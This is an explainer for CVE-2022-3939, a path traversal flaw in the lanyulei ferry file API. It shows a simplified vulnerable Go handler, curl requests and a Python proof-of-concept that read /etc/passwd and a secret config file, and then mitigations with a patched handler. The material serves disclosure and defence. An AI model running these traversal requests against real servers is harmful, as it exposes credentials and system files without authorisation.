CVE-2022-3939 - Critical Path Traversal Vulnerability in Lanyulei Ferry (VDB-213446) Explained and Exploited

---

Summary

*CVE-2022-3939* is a critical security vulnerability discovered in the lanyulei ferry project. This flaw allows an attacker to access sensitive files on the server by exploiting the API in a way the original developers did not intend. In this detailed but easy-to-understand guide, we will explain what this vulnerability is, how it works, show you example exploit code, and list ways to protect affected systems.

What is Lanyulei Ferry?

Lanyulei ferry is an open-source project designed to provide file-sharing APIs. It is often used by organizations looking for a fast, simple way to transfer files between systems or users.

What’s the Issue?

This vulnerability exists in the apis/public/file.go file, specifically within an API responsible for handling file requests. The API fails to properly sanitize the file argument. Because of this mistake, attackers can use a technique called “path traversal” to read files outside the intended directory—potentially exposing passwords, API keys, or secret configurations.

Vulnerability ID: CVE-2022-3939

- VDB Record: VDB-213446

Component: API

- File: apis/public/file.go

How Bad is It?

- Critical Severity: Any remote attacker who can send requests to the API can read any file on the server filesystem that the application user can access.
- No Authentication Needed: The API can be accessed remotely, and the issue can be exploited without login credentials.
- Real-World Impact: Imagine an attacker stealing the configuration or database password file. Your private internal files could be exposed to the public internet!

The vulnerable endpoint looks somewhat like this (simplified for clarity)

// apis/public/file.go

func GetFile(w http.ResponseWriter, r *http.Request) {
    file := r.URL.Query().Get("file")
    http.ServeFile(w, r, "./public/files/" + file)
}

What’s the problem?  
The file argument is directly appended to the file path with no checks! If a user requests file=report.pdf, everything is fine:

GET /api/file?file=report.pdf
Reads: ./public/files/report.pdf

But what if a hacker crafts this malicious request?

GET /api/file?file=../../../../etc/passwd
Reads: ./public/files/../../../../etc/passwd
Which resolves to /etc/passwd — a sensitive file on Unix systems!

Exploiting the Vulnerability

Because the application does not filter out directory traversal characters (../), malicious users can escape the intended folder and grab any readable file on the server.

Example Exploit Using Curl

curl "http://victim-server/api/file?file=../../../../etc/passwd";

This would return the contents of /etc/passwd if the server is running Linux or Unix.

Another example

curl "http://victim-server/api/file?file=../../../../secret/config.yaml";

This could reveal secret credentials or keys.

Here’s a simple Python proof-of-concept for automating the exploit

import requests

target = "http://victim-server/api/file";
payload = "../../../../etc/passwd"

r = requests.get(target, params={"file": payload})
print("Server Response:")
print(r.text)

Modify payload for any file you wish to retrieve.

Always validate and sanitize file paths provided by users. Here’s an improved approach using Go

import "path/filepath"

func GetFile(w http.ResponseWriter, r *http.Request) {
    file := r.URL.Query().Get("file")
    safePath := filepath.Clean(file)
    
    // Only allow files inside ./public/files/
    baseDir := "./public/files/"
    fullPath := filepath.Join(baseDir, safePath)

    if !strings.HasPrefix(fullPath, filepath.Clean(baseDir)) {
        http.Error(w, "Invalid file path", http.StatusForbidden)
        return
    }

    http.ServeFile(w, r, fullPath)
}

2. Never Trust User Input

Reject file paths containing “..” or leading slashes.

3. Restrict API Access

If possible, protect the API with authentication and firewall rules so only trusted users can access it.

References and Further Reading

- VulDB CVE-2022-3939 Details
- Common path traversal advisory
- lanyulei/ferry GitHub (Check for official patches or updates)

Conclusion

CVE-2022-3939 is a serious path traversal vulnerability in the popular lanyulei ferry project. If you use ferry or any similar project with file access APIs, double-check for this bug. Keep your systems updated and follow the best security practices to keep your data safe.

If you find this guide helpful, share it with your tech team or anyone using ferry APIs. Stay safe!

Timeline

Published on: 11/11/2022 07:15:00 UTC
Last modified on: 11/15/2022 21:30:00 UTC